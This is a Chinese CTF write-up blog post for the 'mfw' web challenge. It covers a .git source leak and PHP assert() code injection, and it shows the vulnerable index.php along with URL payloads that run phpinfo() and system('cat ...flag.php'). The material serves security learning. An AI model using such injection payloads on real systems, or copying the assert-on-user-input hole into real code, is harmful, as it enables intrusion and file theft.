攻防世界:mfw

最新推荐文章于 2024-04-09 16:10:20 发布
最新推荐文章于 2024-04-09 16:10:20 发布
阅读量101 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/118966076
版权
这篇博客讲述了如何发现并利用Git源码泄露,通过GitHack下载源码,然后利用PHP的assert函数执行命令,展示了payload构造过程,包括如何绕过安全检查执行phpinfo()和cat flag.php等操作。
摘要由CSDN通过智能技术生成

 几个页面点开看一看,有个Git,自然想到Git源码泄露

 扫一下,还真有

 然后用GitHack来下载一下源码。

 OK!有个flag.php 就先查看这个文件

 在index.php 中有这样的代码。

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

可以利用assert进行命令执行。

就和SQL注入拼接SQL语句一样,我们也可以来拼接PHP语句。

payload:http://111.200.241.244:49226/?page=')or  phpinfo();//

 执行了。

http://111.200.241.244:49226/?page=')or system('cat templates/flag.php');//

 

~羽~.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界----mfw
Red Rapefruit
08-04 2818
攻防世界----mfw 题目描述: 页面描述 解题思路 观察上图,我们可以获得两个比较重要的信息 1.该网站是用git托管源码,以及用PHP编写 2.有一个flag文件(猜测后缀为.PHP) 怀疑存在.git源码泄露,于是尝试访问或者是dirsearch扫描目录 http://220.249.52.133:47363 /.git 利用githack下载源码,详细代码自己发现,获得以下的信息 1.关键的代码 2.template目录下存在flag.php文件(你可以尝试直接cat一下) <?ph
攻防世界-mfw
最新发布
weixin_64659753的博客
05-26 324
攻防世界-mfw
攻防世界——mfw
m0_62063669的博客
06-23 1533
攻防世界——mfw当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。发现有Git,可能是Git泄露,直接/.git 确实存在git泄露那我们使用GitHack还原在templates目录下发现了flag.php,在index.php中发现关键代码strpos()函数查找".."在$file中第一次出现的位置。如果没有找到则返回falsefile_exists()函数检查$file是否存在assert()函数会将括号中的
攻防世界---mfw
qq_44418229的博客
07-21 275
攻防世界---mfw 知识点1:git泄露 知识点2:assert函数的命令执行漏洞
mfw(攻防世界
m0_70819573的博客
02-25 352
2.在about界面上发现了Git,自然想到githack获取源码,发现index.php中的assert函数未经有任何过滤。1.打开环境,审计代码。3.利用payload。
Gjhnsn.github.io:MFW投资组合
03-30
2. **个人投资组合**: MFW投资组合可能代表一个特定的投资模型或策略,用户可以在此展示他们的投资选择、历史回报和风险管理策略。这样的网站通常包括投资组合概述、资产配置、市场分析和投资目标等内容。 3. **...
peach-pit-mfwMFW第一天示例
02-25
"peach-pit-mfw"似乎是一个项目或教程的名称,它以"MFW第一天示例"为主题,意在引导用户了解或学习某个特定的技术或流程。"MFW"可能是"Monday First Working"的缩写,暗示这是系列教程的第一天,通常会介绍基础概念...
gmfw:基于MFW和BMFW的简单WordPress主题
02-22
GMFW 一个基于MFW和BMFW的简单WordPress主题。 MFW: : BMFW: ://bettermotherfuckingwebsite.com/ 请访问。
mfw-bootstrap
04-02
在压缩包文件"mfw-bootstrap-main"中,我们可以期待找到以下关键文件和目录: 1. **index.html** - 这通常是项目的主入口文件,展示了如何引入和使用Bootstrap模板及组件。 2. **css** - 包含自定义CSS样式文件,...
mfw-portfolio:移动友好投资组合决赛'20
03-31
"mfw-portfolio:移动友好投资组合决赛'20"是一个项目,主要关注于创建一个适应移动设备的投资组合页面,这在当前移动优先的互联网环境中至关重要。该项目可能旨在展示参赛者在网页设计和开发,尤其是CSS(层叠样式表...
攻防世界mfw_攻防世界-Web-mfw
weixin_29054399的博客
01-14 166
题目信息:image.png工具:GitHack,dirsearch知识点:git漏洞、代码审计打开题目场景,检查网站,发现这样一个页面image.png访问.git目录,疑似存在git源码泄露image.png再用dirsearch扫描,发现git源码泄露:使用 GitHack获取源码image.png得到源码index.php中关键代码如下if (isset($_GET['page'])) {...
攻防世界 web mfw
liuxiaohuai_的博客
03-28 308
打开网页点击about: 看到有提示git 那这个题就先从git源码泄露入手把。 在URL后加入.git/进入: 在linux中使用GitHacker脚本 下载方法: pip install requests #安装需要的第三方库,如果已安装请忽略! git clone https://github.com/wangyihang/GitHacker.git python2 GitHacker.py http://111.200.241.244:38019/.git/ #后面的url可以换成自己想扫的网站,
攻防世界mfw(.git文件泄露)
2302_79800344的博客
04-09 656
【代码】【攻防世界mfw(.git文件泄露 + )
攻防世界 WEB mfw
qq_41696858的博客
08-20 201
这题考的是两个点:Git泄露和assert函数执行代码 先说Git泄露,通过About发现该网站使用了Git,查看/.git目录发现确实存在泄露情况 那么下载GitHacker工具查看源码 pip3 install GitHacker githacker --url http://111.200.241.244:60711/ --folder result1 //这里的folder表示的是输出文件夹 然后查看源码,在index.php里面发现assert函数 $file = “templates/” . $
攻防世界 mfw(Git源码泄露与命令执行漏洞)
Welcome To Myon'Blog !
06-01 2318
Git 源码泄露: 1、strpos() 函数 2、assert()函数 3、file_exists() 函数 4、die()函数 代码审计: 命令执行漏洞:
攻防世界-web-mfw
wallacegen的博客
11-18 301
开始没有什么思路,参考网上别人的wp,首先提到的一个点就是源码泄漏 摘自https://lddp.github.io/2018/05/10/WEB-%E6%BA%90%E7%A0%81%E6%B3%84%E6%BC%8F/ 关于源码泄漏,这位师傅已经总结了。 然后是git源码泄漏,用GitHack-master下载下来之后,可以看到源码。 先来看index.php <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值